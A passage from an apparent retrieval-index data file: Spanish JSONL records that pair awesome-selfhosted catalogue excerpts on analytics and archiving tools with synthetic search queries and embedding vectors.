0.0057, -0.01314, -0.00186, 0.0224, -0.06544, 0.06456, -0.03223, -0.0329, -0.20882, 0.09047, 0.04053, -0.06838, 0.13798, -0.15921, 0.05451, -0.09392, -0.12004, 0.08207, 0.03314, 0.04812, -0.04731, -0.04942, 0.02056, 0.02983, -0.08124, 0.09807, 0.02926, 0.01661, 0.00198, -0.02906, 0.13259, 0.04259, 0.0213, 0.06792, -0.0102, -0.01211, 0.06991, -0.10114, -0.11353, 0.03657, -0.09495, -0.05688, 0.05367, -0.05967, 0.02317, -0.05015, -0.01923, 0.06515, -0.05746, -0.02076, -0.02614, 0.04533, 0.14799, -0.12667, 0.03719, -0.05579, 0.11326, -0.09079, -0.02556, 0.05453, 0.06044, 0.05402, 0.01368, -0.06929, -0.08476, -0.04506, 0.0336, -0.02639, -0.05554, -0.03601, 0.0438, 0.04672, -0.00033, -0.00771, -0.02807, -0.05899, 0.04903, 0.00437, -0.10193, -0.05398, -0.11716, 0.0072, -0.02217, 0.05172, 0.04376, -0.03392, 0.00035, -0.05484, -0.1146, 0.07237, -0.02467, 0.08444, -0.0111, -0.06334, -0.04073, -0.03391, 0.02676, 0.03804, 0.01625, -0.07455, 0.0649, -0.02678, 0.01334, -0.02213, -0.09051, 0.02414, -0.01387, -0.00214, -0.05205, 0.02352, -0.05243, -0.01851, -0.06653, -0.02885, -0.08479, -0.00682, -0.0502, -0.06376, 0.07894, 0.10712, 0.07884, -0.04714, 0.01319, 0.01533, 0.08081, 0.05799, 0.04071, 0.07333, 0.02966, -0.07926, 0.04205, -0.03527, -0.03627, -0.01899, 0.0385, -0.07095, -0.04324, -0.04402, -0.01914, -0.01453, -0.04777, -0.07172, 0.00293, -0.06621, 0.02116, 0.06078, -0.04565, 0.07118, 0.023, -0.01003, 0.10204, -0.01417, -0.01267, -0.08875, 0.05441, -0.02845, -0.03541, 0.01573, -0.03525, -0.04365, 0.00092, 0.08584, -0.01964, 0.00718, 0.00769, -0.00558, 0.01118, -0.03294, 0.00405, -0.06132, 0.00996, -0.04652, 0.06373, -0.0258, -0.01131, -0.00574, 0.0127, -0.01162, -0.00139, -0.00931, -0.02174, 0.06539, 0.04895, -0.00533, -0.0324, -0.0135, 0.0123, -0.01541, -0.0253, -0.0022, -0.00333, -0.04094, 0.0233, -0.05227, -0.01857, -0.03848, -0.01051, 0.03722, 0.00145, 0.02757, -0.0028, -0.08261, -0.00503, 0.01273, -0.01172, -0.08694, -0.03859, 0.01813, 0.07371, -0.02771, 0.01563, 0.00845]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Rybbit β€” Web and products analytics that is easy to setup and more intuitive (alternative to Google Analytics) [AGPL-3.0, Docker]. Shaper β€” Build Data Dashboards all in SQL. Powered by DuckDB [MPL-2.0, Docker/Nodejs/Python/Go]. Socioboard β€” Social media management, analytics, and reporting platform supporting nine social media networks out-of-the-box [⚠, GPL-3.0, Nodejs]. Statistics for Strava β€” Statistics dashboard generated from Strava data [⚠, AGPL-3.0, Docker]. Superset β€” Modern data exploration and visualization platform [Apache-2.0, Python]. Swetrix β€” Ultimate, open-source web analytics to satisfy all your needs [AGPL-3.0, Docker]. Umami β€” Simple, fast, privacy-focused alternative to Google Analytics [MIT, Nodejs/Docker]. Vince β€” Web analytics and dashboard (alternative to Google Analytics) [AGPL-3.0, Go/Docker/K8S/deb].", "indexar": "con quΓ© programa puedo generar reportes de estadΓ­sticas desde mi cuenta de Strava", "v": [0.02714, 0.16472, -0.01844, -0.09851, 0.09374, -0.00309, 0.02159, -0.14471, -0.11052, -0.11333, -0.17514, -0.04547, -0.02665, -0.04105, 0.11167, 0.07786, 0.12537, -0.04799, 0.09905, 0.02679, -0.03743, -0.12717, 0.05289, -0.06781, -0.02996, -0.02584, -0.00043, -0.07429, -0.04419, 0.01332, 0.01484, 0.00834, 0.00981, -0.11079, 0.03853, 0.07335, 0.10885, 0.08557, 0.06041, -0.05018, 0.05395, -0.06796, 0.10326, -0.08113, 0.18353, -0.07532, -0.05435, 0.04255, -0.12228, -0.00684, -0.04719, 0.05406, -0.011, -0.03734, -0.03951, -0.00236, -0.11839, -0.15208, -0.02182, 0.03905, 0.05535, 0.0195, -0.02961, -0.02516, -0.0402, -0.0546, 0.09271, -0.06107, -0.11773, -0.0117, 0.05119, 0.07302, -0.00841, -0.0658, 0.04292, 0.03709, -0.02752, -0.09277, -0.04604, -0.03277, -0.07627, -0.09165, 0.02631, 0.10317, -0.05414, -0.00114, 0.02795, -0.04373, 0.08854, -0.00732, 0.00636, -0.08054, -0.03747, 0.12162, 0.04185, 0.0145, 0.15399, -0.02166, -0.02372, -0.0294, -0.02195, -0.06538, -0.08341, 0.11663, -0.02216, 0.08897, 0.10103, -0.02092, -0.07915, 0.07204, -0.00351, -0.02488, -0.10275, -0.03615, -0.02138, 0.0161, -0.04356, 0.00233, 0.06381, -0.05514, -0.01787, 0.10924, -0.03288, 0.03577, -0.03219, -0.06912, -0.02288, 0.09648, 0.05016, 0.08264, 0.0237, 0.0315, 0.01106, -0.06441, 0.0105, -0.04359, -0.05171, -0.08828, 0.07695, 0.00105, -0.01047, 0.07094, 0.09287, -0.04126, 0.01041, -0.072, -0.00924, -0.04626, -0.05096, 0.01024, 0.03129, -0.02907, -0.03298, -0.00873, -0.04097, -0.01604, -0.02122, -0.07662, -0.01915, -0.00346, 0.00773, 0.01407, -0.02245, -0.01816, 0.14425, -0.03788, -0.02722, -0.01982, 0.14636, 0.04722, -0.10583, 0.08256, 0.07466, -0.13145, -0.02403, -0.0537, -0.04549, -0.12374, -0.00758, -0.04604, -0.07137, 0.04594, 0.01994, -0.03133, 0.01262, -0.0477, -0.01494, -0.03259, 0.08581, 0.09515, -0.01082, 0.03424, 0.04598, -0.00498, 0.01465, -0.03205, 0.05586, 0.01142, 0.08255, -0.10143, -0.06254, 0.0499, -0.02402, -0.0133, 0.03356, 0.1005, -0.04003, 0.00588, 0.02564, 0.05852, 0.04718, -0.07834, -0.01343, -0.03332, -0.0715, -0.00334, 0.01648, 0.00897, 0.0588, 0.01526, 0.04497, 0.00487, 0.06256, 0.00821, -0.03751, -0.06057, 0.02968, 0.02127, 0.02964, 0.0345, -0.05372, -0.01669, -0.03205, -0.02802, 0.01791, 0.02154, 0.01658, -0.04524, -0.02789, -0.06933, 0.00093, 0.06482, 0.07718, -0.08547, -0.02213, 0.00473, -0.05033, 0.04211, -0.02314, -0.08286, -0.05038, 0.03532, 0.06672, -0.00629, 0.08318, 0.00402]} +{"tipo": "pregunta", "herramienta": "Analytics", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Analytics", "tema": "analytics", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Analytics: Rybbit β€” Web and products analytics that is easy to setup and more intuitive (alternative to Google Analytics) [AGPL-3.0, Docker]. Shaper β€” Build Data Dashboards all in SQL. Powered by DuckDB [MPL-2.0, Docker/Nodejs/Python/Go]. Socioboard β€” Social media management, analytics, and reporting platform supporting nine social media networks out-of-the-box [⚠, GPL-3.0, Nodejs]. Statistics for Strava β€” Statistics dashboard generated from Strava data [⚠, AGPL-3.0, Docker]. Superset β€” Modern data exploration and visualization platform [Apache-2.0, Python]. Swetrix β€” Ultimate, open-source web analytics to satisfy all your needs [AGPL-3.0, Docker]. Umami β€” Simple, fast, privacy-focused alternative to Google Analytics [MIT, Nodejs/Docker]. Vince β€” Web analytics and dashboard (alternative to Google Analytics) [AGPL-3.0, Go/Docker/K8S/deb].", "indexar": "cual es una alternativa libre y fΓ‘cil de configurar a las herramientas de rastreo web populares", "v": [-0.00288, 0.11561, -0.21812, -0.08842, -0.04523, -0.0377, 0.07732, -0.0568, -0.13238, -0.07367, -0.09103, -0.11608, -0.05899, -0.06227, 0.16938, -0.04612, -0.02736, -0.05048, 0.07499, 0.02147, -0.12511, -0.06364, -0.10592, 0.01502, -0.04184, -0.03685, 0.06982, -0.07091, -0.10659, 0.07319, 0.081, 0.05148, -0.02303, -0.01121, -0.13383, 0.03509, 0.11685, 0.07698, -0.0121, -0.02288, -0.0048, -0.15759, -0.08691, 0.06369, -0.00698, -0.00398, -0.09169, -0.01862, 0.00227, 0.01395, -0.03419, -0.06936, -0.0644, -0.02099, 0.04177, -0.08769, 0.22502, -0.15171, -0.07292, -0.10104, -0.1187, 0.04979, 0.04358, 0.07113, 0.00773, -0.01617, -0.06311, -0.02102, -0.12975, 0.03337, 0.06663, 0.02529, 0.00054, 0.05576, 0.1105, 0.11829, -0.06308, 0.03256, 0.02773, 0.00657, 0.0494, -0.09142, -0.04433, 0.03415, -0.13935, -0.07016, 0.07307, -0.10597, 0.01616, 0.02437, 0.07616, 0.05397, 0.02907, 0.03352, 0.0482, -0.07495, 0.05812, 0.06804, 0.00016, 0.02442, 0.08301, 0.01435, -0.12297, 0.03525, 0.0348, -2e-05, 0.01648, 0.03596, -0.11765, 0.03166, 0.01266, 0.03206, -0.02261, -0.02117, 0.0233, -0.04288, -0.05471, 0.01412, -0.02237, -0.10068, 0.00231, 0.0101, -0.01653, -0.03767, -0.01342, 0.04297, 0.04191, 0.08136, -0.00998, 0.00683, 0.07113, -0.11277, -0.05239, -0.06337, -0.09049, -0.04117, 0.05103, -0.10002, 0.0106, -0.0803, 0.03441, 0.01521, -0.07647, -0.11117, 0.07613, -0.05163, 0.06527, -0.08096, -0.06381, 0.00524, -0.06679, 0.01172, 0.03106, 0.07016, -0.06754, 0.00038, -0.04994, -0.04537, -0.04924, 0.05503, -0.03306, -0.03889, 0.03592, -0.01246, 0.0145, 0.0142, -0.02449, 0.03169, 0.02059, 0.01749, 0.01064, 0.08935, 0.05973, -0.08661, 0.08491, -0.07813, -0.02604, -0.07867, 0.04776, -0.03774, -0.01607, 0.04239, -0.05227, 0.02435, -0.01583, -0.06638, 0.02648, -0.00046, 0.00077, 0.0351, -0.02072, -0.00139, -0.09695, -0.07737, 0.01516, 0.03307, -0.0684, -0.05996, -0.0166, -0.03047, -0.08102, -0.06134, 0.00658, -0.07672, 0.00851, 0.01568, -0.07316, -0.0027, 0.00279, 0.04597, 0.04007, -0.03648, 0.08089, -0.02555, 0.01394, -0.02532, 0.0579, -0.03784, -0.0342, 0.00706, 0.04158, 0.04823, 0.07266, 0.01272, -0.05511, -0.0048, 0.00364, 0.00476, 0.02587, 0.02794, -0.03688, -0.00584, 0.00682, -0.0294, 0.0261, -0.00012, 0.04852, -0.00727, -0.06314, 0.05, 0.09577, 0.07456, -0.01894, 0.00369, -0.05132, -0.01017, -0.11006, -0.02838, -0.01699, -0.07197, -0.04698, 0.04248, 0.0488, -0.01054, -0.00158, -0.02371]} +{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): ArchiveBox β€” Create HTML & screenshot archives of sites from your bookmarks, browsing history, RSS feeds, or other sources (alternative to Wayback Machine) [MIT, Python/Docker]. ArchivesSpace β€” Archives information management application for managing and providing Web access to archives, manuscripts and digital objects [ECL-2.0, Ruby]. Bichon β€” Email archiving server that syncs from IMAP accounts, indexes emails for full-text search, and provides a REST API. No external database required, includes WebUI with multi-account support [AGPL-3.0, Rust/Docker]. bitmagnet β€” BitTorrent indexer, DHT crawler, content classifier and torrent search engine with web UI, GraphQL API and Servarr stack integration [MIT, Go/Docker]. CKAN β€” Make open data websites [AGPL-3.0, Python]. Collective Access - Providence β€” Highly configurable Web-based framework for management, description, and discovery of digital and physical collections supporting a variety of metadata standards, data types, and media formats [GPL-3.0, PHP].", "indexar": "quΓ© programa sirve para archivar sitios web desde mis favoritos y navegadores", "v": [0.04469, 0.03421, -0.09246, -0.15863, 0.03271, -0.09425, 0.11008, -0.13454, -0.06726, -0.09962, 0.02013, -0.08821, 0.00057, -0.05491, 0.07279, 0.06397, 0.20611, -0.06925, 0.16401, 0.0249, -0.01157, 0.01487, 0.00768, -0.01442, -0.11727, -0.12544, 0.04372, -0.00777, -0.10102, 0.05241, -0.05449, 0.01933, 0.04486, 0.01904, -0.01965, 0.00801, 0.13597, -0.00626, -0.11263, -0.03073, 0.05545, -0.02299, -0.10571, 0.04552, -0.06029, -0.01246, -0.04751, -0.06446, 0.02671, -0.10284, 0.04493, -0.02036, -0.09593, 0.07349, 0.00873, -0.02857, 0.06651, -0.15615, 0.02904, 0.03953, -0.0743, 0.0618, 0.00106, 0.02028, 0.02532, -0.10418, 0.00554, 0.03837, -0.08199, 0.02011, -0.01881, 0.09833, 0.11109, 0.01334, 0.04997, 0.04245, -0.00604, 0.00192, 0.02723, -0.01408, 0.03424, -0.00186, -0.02898, 0.06428, -0.11096, -0.05125, -0.02075, -0.05426, -0.01806, -0.08875, 0.08474, 0.12898, -0.04138, 0.05562, 0.01246, -0.15285, 0.16402, 0.05815, 0.077, 0.00941, 0.05313, -0.03094, -0.04701, 0.13995, 0.06365, 0.10618, 0.08144, -0.03559, -0.07422, 0.00713, 0.05363, -0.04594, -0.06783, -0.01292, -0.05473, 0.0367, 0.02939, -0.00199, 0.04779, -0.11844, -0.13553, 0.00591, -0.11406, 0.02264, -0.01316, 0.0522, 0.03625, 0.04584, -0.02692, 0.00238, 0.02621, -0.02304, -0.06741, 0.0306, -0.03069, -0.01953, 0.0228, 0.01897, 0.0441, -0.04823, 0.10196, -0.01544, -0.06803, 0.08553, 0.08662, 0.01695, 0.04584, -0.03584, -0.07239, -0.08743, -0.06086, -0.01591, -0.01689, -0.01261, -0.05478, 0.0049, -0.07631, -0.0728, -0.07362, 0.04236, -0.05377, 0.03837, 0.05186, 0.01218, 0.018, -0.05682, -0.0855, 0.06354, 0.12479, 0.06606, 0.0167, 0.09703, -0.02165, -0.19901, 0.01059, -0.0115, -0.01966, -0.01819, 0.08883, -0.03086, -0.05023, -0.01024, 0.03076, 0.07038, -0.09787, -0.0655, 0.03087, -0.03664, -0.02582, 0.01258, -0.03435, -0.0366, -0.0662, 0.01577, 0.07904, 0.02251, -0.05993, -0.0066, 0.05222, -0.04036, -0.02673, -0.05494, 0.00988, 0.0047, -0.00258, 0.0992, -0.0179, -0.09681, 0.02766, 0.09123, -0.0362, -0.0424, 0.04191, -0.04264, -0.00524, -0.07811, 0.07736, 0.03192, -0.01787, 0.01189, 0.01963, -0.03253, -0.00277, 0.04131, 0.03606, -0.03547, 0.07444, -0.00884, 0.00383, -0.00567, -0.02123, -0.06616, -0.03465, -0.026, 0.03836, -0.0232, -0.0374, -0.01946, -0.04275, -0.03319, -0.06569, 0.04853, -0.0044, -0.04529, 0.04401, -0.02121, -0.08569, -0.00467, 0.02422, 0.0052, -0.06843, 0.01005, 0.02688, -0.04056, 0.00136, 0.02143]} +{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): ArchiveBox β€” Create HTML & screenshot archives of sites from your bookmarks, browsing history, RSS feeds, or other sources (alternative to Wayback Machine) [MIT, Python/Docker]. ArchivesSpace β€” Archives information management application for managing and providing Web access to archives, manuscripts and digital objects [ECL-2.0, Ruby]. Bichon β€” Email archiving server that syncs from IMAP accounts, indexes emails for full-text search, and provides a REST API. No external database required, includes WebUI with multi-account support [AGPL-3.0, Rust/Docker]. bitmagnet β€” BitTorrent indexer, DHT crawler, content classifier and torrent search engine with web UI, GraphQL API and Servarr stack integration [MIT, Go/Docker]. CKAN β€” Make open data websites [AGPL-3.0, Python]. Collective Access - Providence β€” Highly configurable Web-based framework for management, description, and discovery of digital and physical collections supporting a variety of metadata standards, data types, and media formats [GPL-3.0, PHP].", "indexar": "con quΓ© puedo montar un servidor de correo para archivar emails en lugar de usar Outlook", "v": [-0.04533, 0.01401, -0.13492, -0.1932, -0.14226, -0.05691, 0.03812, -0.05274, -0.0252, -0.05481, -0.14511, -0.13085, 0.21388, 0.02194, 0.03683, -0.02339, 0.257, -0.04528, 0.0031, 0.01417, -0.01764, 0.07903, -0.079, 0.01866, -0.07052, 0.10906, -0.01832, 0.0149, 0.00583, 0.02595, 0.00796, 0.01581, -0.00119, 0.03365, 0.05761, 0.04389, 0.06694, 0.08167, -0.06036, -0.00345, 0.06775, 0.04467, -0.12176, 0.07563, 0.00694, 0.01262, 0.02161, 0.07157, 0.04854, -0.0272, -0.05339, -0.09955, -0.13301, 0.02857, -0.02874, 0.08009, 0.04432, -0.08354, 0.18025, -0.03856, -0.08538, 0.09488, -0.01204, 0.10634, -0.04392, -0.03531, -8e-05, -0.03203, -0.20412, -0.00514, 0.01954, -0.03076, -0.00136, -0.01565, 0.00097, 0.02617, 0.03331, -0.0311, -0.07982, 0.12564, 0.00333, -0.07695, -0.00209, 0.09324, -0.08958, -0.10571, 0.02653, -0.05368, -0.03843, -0.09598, 0.05467, 0.03357, -0.08357, 0.06614, 0.0166, -0.12298, -0.02363, -0.04858, -0.0503, 0.03227, -0.00968, -0.00185, -0.03, 0.17573, 0.00856, 0.05584, 0.03237, -0.03395, 0.10506, 0.00386, 0.03175, -0.03275, -0.00258, 0.00777, -0.10007, -0.15409, 0.02909, -0.10826, 0.04948, 0.06269, -0.00315, 0.04676, 0.02298, 0.03346, 0.01301, -0.07573, 0.08834, 0.04285, -0.05265, 0.0381, -0.06338, -0.08234, -0.10408, -0.05025, -0.00492, -0.01649, -0.02476, -0.09586, -0.07173, -0.04262, 0.04314, -0.0075, -0.04252, -0.00514, 0.07183, 0.05381, 0.03063, -0.03585, -0.10549, -0.04354, 0.06924, -0.04839, 0.0047, -0.06333, -0.08516, -0.04243, 0.0548, -0.07285, 0.02961, 0.04985, -0.04321, 0.05436, -0.00361, 0.14312, 0.00679, -0.12135, 0.01867, 0.03571, -0.0203, 0.08179, 0.0237, 0.03474, 0.01947, -0.07402, 0.00276, 0.00523, 0.02243, 0.02051, 0.02401, 0.03916, -0.01682, 0.0408, 0.01333, 0.03425, -0.09591, 0.00481, 0.01745, -0.02381, -0.00711, 0.06978, -0.06415, 0.02464, 0.02284, 0.04636, 0.02347, -0.03069, -0.05879, -0.0724, -0.06919, -0.05121, -0.02004, -0.04061, -0.03484, -0.01769, 0.00042, 0.00432, -0.11076, 0.01896, -0.01381, 0.03212, -0.00084, -0.02194, 0.04284, -0.01089, 0.00426, -0.02084, 0.05417, -0.02658, -0.01701, 0.00426, -0.02009, -0.02135, -0.00772, -0.05795, 0.00122, 0.03536, -0.01869, -0.00273, 0.00547, 0.02156, -0.014, 0.06966, -0.06181, -0.00129, 0.04415, -0.02265, 0.04171, -0.04276, 0.02597, -0.0405, 0.01116, 0.07502, -0.0191, 0.01346, -0.03551, -0.01795, -0.06387, 0.03317, -0.08244, -0.01069, -0.01965, -0.04134, -0.0137, -0.01648, 0.01435, -0.00744]} +{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): ArchiveBox β€” Create HTML & screenshot archives of sites from your bookmarks, browsing history, RSS feeds, or other sources (alternative to Wayback Machine) [MIT, Python/Docker]. ArchivesSpace β€” Archives information management application for managing and providing Web access to archives, manuscripts and digital objects [ECL-2.0, Ruby]. Bichon β€” Email archiving server that syncs from IMAP accounts, indexes emails for full-text search, and provides a REST API. No external database required, includes WebUI with multi-account support [AGPL-3.0, Rust/Docker]. bitmagnet β€” BitTorrent indexer, DHT crawler, content classifier and torrent search engine with web UI, GraphQL API and Servarr stack integration [MIT, Go/Docker]. CKAN β€” Make open data websites [AGPL-3.0, Python]. Collective Access - Providence β€” Highly configurable Web-based framework for management, description, and discovery of digital and physical collections supporting a variety of metadata standards, data types, and media formats [GPL-3.0, PHP].", "indexar": "que herramienta hay para crear una web que muestre datos abiertos", "v": [-0.04209, 0.086, -0.08941, -0.16501, 0.04644, -0.06767, -0.10256, -0.01214, -0.0568, -0.09316, -0.14828, -0.12621, -0.03112, -0.11122, 0.0385, 0.04452, 0.12539, -0.14959, -0.0048, -0.05234, -0.08836, 0.01639, -0.03571, -0.02555, -0.12498, -0.13662, 0.01475, -0.02228, -0.22086, 0.16138, 0.03058, 0.08519, -0.07286, 0.0057, 0.01346, -0.02309, 0.05053, 0.06785, -0.0451, -0.02929, -0.05312, 0.01458, -0.06055, 0.1435, -0.00695, 0.0373, -0.0779, -0.02684, -0.00643, 0.15983, 0.00887, -0.12569, -0.13086, -0.04737, 0.05287, -0.0729, 0.16878, -0.14461, 0.03266, -0.05524, -0.13109, 0.07791, -0.04844, -0.04259, -0.0336, -0.05341, 0.0688, 0.0142, -0.07544, 0.13424, 0.02806, 0.02624, 0.03953, -0.0157, 0.06979, -0.02524, 0.01384, 0.03001, -0.06835, 0.04264, 0.01473, 0.00371, -0.00827, -0.00944, -0.03144, -0.01137, 0.09766, 0.0086, 0.00459, -0.05895, 0.05914, 0.12672, -0.06994, 0.05836, 0.048, 0.01472, 0.05395, -0.08145, -0.02074, -0.0334, 0.00395, -0.00931, -0.11634, 0.01092, 0.02298, 0.07697, 0.02219, 0.00318, -0.13191, 0.01105, 0.02457, -0.03612, 0.00047, -0.00804, 0.04695, 0.0234, 0.02, -0.01872, -0.04518, -0.05469, 0.08266, 0.00612, -0.06803, -0.03479, -0.08305, -0.03316, -0.05688, 0.04427, -0.01712, -0.00896, -0.04522, -0.07194, -0.11608, 0.03602, 0.07704, 0.0294, -0.03852, -0.12576, 0.0417, -0.07239, -0.02573, 0.01195, -0.0909, -0.07202, 0.01556, -0.06771, -0.01588, 0.01965, -0.12182, -0.01141, -0.02583, -0.00109, 0.01063, 0.05488, -0.11837, 0.0634, -0.03211, -0.01358, -0.05538, 0.01267, -0.06901, 0.01978, -0.00036, 0.00364, 0.04023, -0.06215, -0.01303, 0.03476, 0.09332, 0.02091, -0.01832, 0.05716, 0.08327, -0.08095, 0.0646, -0.05238, -0.07995, -0.09245, -0.03486, -0.10436, 0.01688, -0.05886, -0.0335, -0.02876, -0.02687, -0.05204, 0.06598, -0.06037, -0.07741, 0.0491, -0.03692, 0.0806, 0.04062, -0.0375, 0.07922, -0.02226, 0.01102, -0.03053, 0.06544, 0.00061, -0.05592, -0.01844, -0.01554, -0.04936, -0.04997, 0.08228, 0.0019, -0.04424, 0.01973, -0.012, 0.02441, -0.04908, 0.01036, -0.06804, 0.01523, -0.02365, 0.03569, 0.01506, -0.02262, -0.03845, 0.02406, 0.02324, 0.03056, -0.01378, -0.00554, 0.04932, 0.01588, -0.01732, 0.03712, -0.03578, 0.00984, -0.08929, 0.00195, -0.00539, 0.01239, -0.06525, 0.02023, -0.05011, -0.05973, -0.00298, -0.02967, 0.05744, 0.00597, -0.03752, 0.01215, -0.04159, -0.0365, 0.03711, -0.05195, -0.10778, -0.04005, -0.03465, 0.01201, -0.04292, -0.00575, -0.00942]} +{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Eonvelope β€” Email archiving software that allows you to preserve your emails for an indefinite long period of time [AGPL-3.0, K8S/Docker]. Ganymede β€” Twitch VOD and live stream archiving platform. Includes a rendered chat for each archive [⚠, GPL-3.0, Docker]. mail-archiver β€” Web application for archiving, searching, and exporting emails from multiple accounts (IMAP, M365 or Import). Featuring folder sync, attachment support, mailbox migration and a dashboard [GPL-3.0, Docker]. Omeka S β€” Next-generation web publishing platform for institutions interested in connecting digital cultural heritage collections with other resources online [GPL-3.0, Nodejs]. Open Archiver β€” Email archiving solution with full-text search and eDiscovery search features [AGPL-3.0, Docker]. Piler β€” Feature-rich email archiving solution [GPL-3.0, C/Docker/deb]. Wallabag β€” Wallabag, formerly Poche, is a web application allowing you to save articles to read them later with improved readability [MIT, PHP].", "indexar": "que programa hay para archivar correos electrΓ³nicos de forma indefinida?", "v": [0.15467, 0.04555, 0.01497, -0.04186, 0.07331, -0.07906, 0.13711, -0.02295, -0.09718, -0.08478, -0.09494, -0.03018, 0.10871, -0.02711, 0.11754, -0.05291, 0.17019, -0.01379, 0.02554, -0.01917, 0.02435, 0.07667, -0.13309, -0.02127, -0.08007, -0.00099, -0.1284, 0.12098, 0.00371, 0.1059, 0.04619, 0.02833, 0.04906, -0.0195, 0.02134, 0.11118, 0.13962, 0.08149, -0.10589, -0.01504, 0.10749, -0.01782, -0.07018, -0.03374, -0.032, -0.07491, -0.00406, 0.07941, 0.05135, -0.0222, -0.05432, 0.0157, -0.09425, 0.03908, 0.01382, -0.08742, 0.07229, -0.12, 0.07876, -0.0479, 0.01458, 0.05523, 0.06051, 0.10889, 0.00921, 0.02041, 0.09108, -0.08756, -0.23015, 0.00116, 0.0385, 0.03655, -0.00929, -0.04388, 0.0097, 0.03396, -0.03507, -0.03155, -0.07192, 0.06462, 0.02739, -0.11725, 0.06518, 0.07476, -0.09229, -0.0854, -0.01759, -0.02132, -0.09474, -0.12866, 0.0238, 0.05327, -0.09176, 0.12274, 0.04532, -0.02747, -0.02629, 0.04469, -0.02227, 0.13148, 0.01008, 0.0641, -0.05806, 0.09991, -0.10246, 0.07612, 0.01537, 0.02764, 0.1393, 0.03891, -0.08387, -0.04162, 0.05339, -0.03645, -0.08423, -0.04785, 0.0551, -0.06593, 0.03983, 0.00074, -0.01204, 0.04881, 0.02643, 0.02164, 0.1013, -0.05512, -0.05391, 0.02237, -0.00425, 0.07766, -0.03031, -0.05298, -0.02331, -0.00632, -0.04772, -0.01897, -0.04546, -0.03638, -0.02379, -0.05048, 0.06702, 0.06703, 0.0019, -0.04081, 0.0503, -0.00365, 0.05223, -0.07949, -0.13265, -0.05588, -0.01067, -0.02421, -0.05094, 0.03629, -0.05642, 0.04387, 0.0189, -0.12974, -0.0335, 0.06836, -0.059, 0.03659, -0.0248, 0.0332, -0.01584, -0.09842, 0.00867, 0.07009, -0.01761, 0.02143, -0.03311, 0.00529, 0.02743, -0.09189, -0.03854, -0.01097, 0.01119, 0.04617, 0.08367, -0.02573, -0.1159, 0.11051, 0.04046, 0.00207, -0.11208, -0.00611, 0.04037, -0.03074, -0.00299, 0.03032, 0.01246, -0.01688, -0.04892, 0.07019, -0.01396, -0.02379, -0.08125, 0.01688, -0.02093, -0.05277, -0.0417, -0.01418, -0.00994, 0.03273, 0.00266, 0.04784, -0.07504, -0.01956, -0.01761, 0.09305, -0.02364, -0.07831, 0.03671, -0.02104, -0.03048, -0.04964, 0.04473, -0.00478, -0.00857, 0.04346, 0.02447, 0.01492, 0.03219, -0.01794, 0.03219, -0.00792, 0.04807, 0.10719, 0.04474, 0.00074, 0.01087, 0.0217, -0.02183, -0.04172, 0.07185, 0.02574, 0.05227, -0.05006, -0.03655, -0.084, 0.01807, 0.09055, -0.06343, 0.00995, -0.02578, -0.02163, -0.10247, 0.01193, -0.04734, 0.00433, -0.03887, 0.03388, -0.01146, -0.05657, 0.02083, 0.01314]} +{"tipo": "pregunta", "herramienta": "Archiving and Digital Preservation (DP)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Archiving and Digital Preservation (DP)", "tema": "archiving and digital preservation (dp)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Archiving and Digital Preservation (DP): Eonvelope β€” Email archiving software that allows you to preserve your emails for an indefinite long period of time [AGPL-3.0, K8S/Docker]. Ganymede β€” Twitch VOD and live stream archiving platform. Includes a rendered chat for each archive [⚠, GPL-3.0, Docker]. mail-archiver β€” Web application for archiving, searching, and exporting emails from multiple accounts (IMAP, M365 or Import). Featuring folder sync, attachment support, mailbox migration and a dashboard [GPL-3.0, Docker]. Omeka S β€” Next-generation web publishing platform for institutions interested in connecting digital cultural heritage collections with other resources online [GPL-3.0, Nodejs]. Open Archiver β€” Email archiving solution with full-text search and eDiscovery search features [AGPL-3.0, Docker]. Piler β€” Feature-rich email archiving solution [GPL-3.0, C/Docker/deb]. Wallabag β€” Wallabag, formerly Poche, is a web application allowing you to save articles to read them later with improved readability [MIT, PHP].", "indexar": "con que puedo guardar videos de Twitch y reproducir el chat?", "v": [-0.04892, 0.04442, -0.19337, 0.01424, 0.06061, 0.01883, -0.078, 0.1027, 0.18011, -0.07633, 0.06183, -0.09478, 0.03207, 0.12724, 0.0182, 0.08663, 0.06376, -0.06995, 0.11353, 0.06272, 0.1435, 0.00539, 0.00688, -0.13332, 0.03273, 0.05357, 0.07164, -0.01989, -0.08824, 0.13182, -0.01551, 0.03752, 0.02448, 0.04809, -0.033, 0.03068, 0.04052, 0.00494, -0.08443, 0.0026, -0.0596, 0.01638, -0.12028, 0.07362, 0.05876, -0.02769, 0.01061, -0.05959, 0.05379, 0.01069, -0.05699, -0.01687, -0.08992, -0.01801, -0.0498, 